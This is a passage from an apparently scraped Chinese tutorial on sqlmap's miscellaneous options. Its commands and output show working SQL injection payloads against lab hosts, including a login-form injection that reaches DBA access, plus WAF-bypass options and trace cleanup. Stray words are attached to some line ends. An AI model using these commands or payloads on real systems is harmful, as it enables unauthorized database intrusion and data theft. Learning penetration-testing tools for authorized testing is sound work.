十8、雜項
1.使用簡寫
參數:-zphp
有些參數組合是被常常用到的,如「--batch --random-agent --ignore-proxy --technique=BEU」,這樣寫一大串很很差看,在Sqlmap中,提供了一種簡寫的方式來縮短命令長度。html
利用參數「-z」,每一個參數均可以只寫前幾個字母,如「--batch」能夠簡寫爲「bat」。簡寫的原則是可以有所區別、對應的參數惟一就行。各個參數用逗號隔開。如:python
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
能夠簡寫爲:mysql
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
再如:git
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
能夠簡寫爲:github
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
2.在成功檢測到注入點時報警
參數:--alertweb
該參數用於在找到新的注入點時發出警報,後跟一個用於發出警報的命令,如:sql
python sqlmap.py -r data.txt --alert "notify-send '找到漏洞了'"
部分輸出以下:shell
[18:59:36] [INFO] GET parameter 'couno' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable (with --not-string="001")
[18:59:36] [INFO] executing alerting shell command(s) ('notify-send '找到漏洞了'')
上例中用於發出警報的命令是Ubuntu中的notify-send命令。數據庫
3.設置問題的回答
參數:--answers
使用「--batch」以非交互模式運行時全部問題都以按默認值做爲回答。有時不想以默認值爲答案又想使用非交互模式,此時可使用參數「--answers」對特定問題進行回答,若回答多個問題,以逗號分隔。如:
python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
部分輸出以下:
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
4.在成功檢測到注入點時發出「嘟」聲
參數:--beep
使用此參數能夠在成功檢測到注入點時發出「嘟」聲。使用「-m」從日誌文件中檢測大量網站時該參數會格外有用。
5.清除Sqlmap建立的臨時表和自定義函數
參數:--cleanup
強烈推薦在測試結束後使用此參數清除Sqlmap建立的臨時表和自定義函數,Sqlmap會盡量地清除數據庫管理系統和文件系統上的入侵痕跡。
6.檢查依賴
參數:--dependencies
Sqlmap的有些功能依賴第三方庫,在用到時發現沒有這些庫會報錯退出。使用此參數能夠檢查依賴的第三方庫是否安裝,如:
python sqlmap.py --dependencies
部分輸出以下:
[*] starting at 19:16:05 [19:16:05] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS 'Firebird'. Download from http://kinterbasdb.sourceforge.net/ [19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Sybase'. Download from https://github.com/pymssql/pymssql [19:16:05] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS 'Oracle'. Download from http://cx-oracle.sourceforge.net/ [19:16:05] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS 'PostgreSQL'. Download from http://initd.org/psycopg/ [19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'IBM DB2'. Download from https://github.com/ibmdb/python-ibmdb [19:16:05] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS 'HSQLDB'. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ [19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'Informix'. Download from https://github.com/ibmdb/python-ibmdb [19:16:05] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS 'Microsoft Access'. Download from https://github.com/mkleehammer/pyodbc [19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Microsoft SQL Server'. Download from https://github.com/pymssql/pymssql [19:16:05] [WARNING] sqlmap requires 'python-impacket' third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/ [19:16:05] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/ [19:16:05] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/ [*] shutting down at 19:16:05
能夠看到我缺乏的主要是用於鏈接數據庫的第三方庫。
7.關閉彩色輸出
參數:--disable-coloring
8.指定使用Google dork結果的某頁
參數:--gpage
使用參數「-g」時默認默認選擇Google dork結果的前100條作注入測試。結合使用此參數,能夠指定使用Google dork結果的某頁。
9.使用HTTP參數污染
參數:--hpp
HTTP參數污染是繞過WAF/IPS/IDS的一種技術,詳情見此處。這一技術針對ASP/IIS和ASP.NET/IIS平臺尤爲有效。若是懷疑目標受WAF/IPS/IDS保護,能夠嘗試用此參數進行繞過。
10.完全檢測WAF/IPS/IDS
參數:--identify-waf
Sqlmap能夠識別WAF/IPS/IDS以便用戶進行鍼對性操做(如:添加「--tamper」)。目前Sqlmap支持檢測30多種不一樣的WAF/IPS/IDS,如Airlock和Barracuda WAF等。檢測WAF的腳本能夠在安裝目錄的waf目錄中找到。
下例的目標是MySQL,受ModSecurity WAF保護:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
部分輸出以下:
[xx:xx:23] [INFO] testing connection to the target URL [xx:xx:23] [INFO] heuristics detected web page charset 'ascii' [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)' [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1' [xx:xx:23] [DEBUG] page not found (404) [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)' [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)' [xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
參數:--skip-waf
默認地Sqlmap會發送虛假的SQL注入playload以試探目標是否有保護措施。若有任何問題,用戶可使用參數「--skip-waf」來禁用這一技術。
11.模仿智能手機
參數:--mobile
有些網站對智能手機和桌面環境的返回是不一樣的。當須要測試這種網站的智能手機頁面時能夠設置一個智能手機的User-Agent,或者更簡單地,使用此參數,Sqlmap會在執行時詢問要模仿成流行的手機中的哪一種,如:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile [...] which smartphone do you want sqlmap to imitate through HTTP User-Agent header? [1] Apple iPhone 4s (default) [2] BlackBerry 9900 [3] Google Nexus 7 [4] HP iPAQ 6365 [5] HTC Sensation [6] Nokia N97 [7] Samsung Galaxy S > 1 [...]
12.離線模式(僅僅使用會話數據)
參數:--offline
添加此參數,Sqlmap將僅僅使用之前存儲的會話數據作測試而不向目標發送任何數據包。
13.在Google dork中展現頁面權重
參數:--page-rank
與參數「-g」一塊兒使用,這會使Sqlmap向Google發起更多的請求並展現頁面權重。
14.從輸出目錄中安全移除全部內容
參數:--purge-output
當用戶想要安全地刪除輸出目錄中的全部內容時使用此參數。所謂安全刪除,不只僅是刪除,而是在刪除前先用隨機數據覆蓋原有數據,甚至對文件名和目錄名也進行重命名以覆蓋舊名稱,全部覆蓋工做完成後才執行刪除。最後,輸出目錄中會一無全部。如:
python sqlmap.py --purge-output -v 3
部分輸出以下:
[*] starting at 19:51:36 [19:51:36] [DEBUG] cleaning up configuration parameters [19:51:36] [INFO] purging content of directory '/home/werner/.sqlmap/output'... [19:51:36] [DEBUG] changing file attributes [19:51:36] [DEBUG] writing random data to files [19:51:36] [DEBUG] truncating files [19:51:36] [DEBUG] renaming filenames to random values [19:51:36] [DEBUG] renaming directory names to random values [19:51:36] [DEBUG] deleting the whole directory tree [*] shutting down at 19:51:36
15.快速掃描
參數:--smart
當有大量URL要進行測試(如:「-m」),目的是儘快找出其中存在的某些注入點而有所遺漏也沒有關係時可使用「--smart」進行正向啓發式掃描。此時只有讓數據庫管理系統報錯的參數纔會作進一步測試,其他URL均被跳過。如:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart [...] [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable [xx:xx:14] [INFO] skipping GET parameter 'ca' [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable [xx:xx:14] [INFO] skipping GET parameter 'user' [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic [xx:xx:14] [INFO] GET parameter 'id' is dynamic [xx:xx:14] [WARNING] reflective value(s) found and filtering out [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL inline queries' [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries' [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [xx:xx:24] [INFO] target URL appears to have 3 columns in query [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable [...]
16.經過關鍵詞使用或跳過payload
參數:--test-filter
若只想使用包含關鍵詞「ROW」的payload可以使用參數「--test-filter=ROW」。下面是以Mysql爲目標的例子:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
部分輸出以下:
[xx:xx:39] [INFO] GET parameter ’id’ is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter ’id’ might be injectable (possible DBMS: ’MySQL’)
[xx:xx:39] [INFO] testing for SQL injection on GET parameter ’id’
[xx:xx:39] [INFO] testing ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’
[xx:xx:39] [INFO] GET parameter ’id’ is ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’ injectable GET parameter ’id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
---
參數:--test-skip
若不想使用包含關鍵詞「BENCHMARK」的payload可以使用參數「--test-skip=BENCHMARK」。
17.交互式Sqlmap Shell
參數:--sqlmap-shell
使用此參數能夠打開一個交互式的Sqlmap Shell,支持歷史記錄。如:
werner@Yasser:~$ sqlmap --sqlmap-shell
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> -u "192.168.56.102"
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:22:46
[20:22:46] [INFO] testing connection to the target URL
[20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:46] [INFO] testing if the target URL is stable
[20:22:47] [INFO] target URL is stable
[20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
[*] shutting down at 20:22:47
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> exit
18.爲初學者準備的簡單向導
參數:--wizard
Sqlmap特意爲初學者準備了一個有着儘量少問題的工做流的嚮導。用戶輸入目標後若一直按回車選擇默認回答到工做流的最後也會獲得一個正確的結果。如:
werner@Yasser:~$ sqlmap --wizard
___
__H__
___ ___["]_____ ___ ___ {1.1.10#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:39:41
[20:39:41] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.56.102/login.php
POST data (--data) [Enter for None]: username=001&password=003
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1
sqlmap is running, please wait..
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: username=001%' OR NOT 2143=2143#&password=003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: username=001%' OR SLEEP(5)#&password=003
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner: '5.5.50-0ubuntu0.14.04.1'
current user: 'root@localhost'
current database: 'DSSchool'
current user is DBA: True
[*] shutting down at 20:40:07
總結
完整閱讀Sqlmap官方手冊後終於對Sqlmap有了一個較爲全面的認識。之前只是有所耳聞,如今切實地感覺到了Sqlmap的強大,也越發敬佩Sqlmap的兩位做者: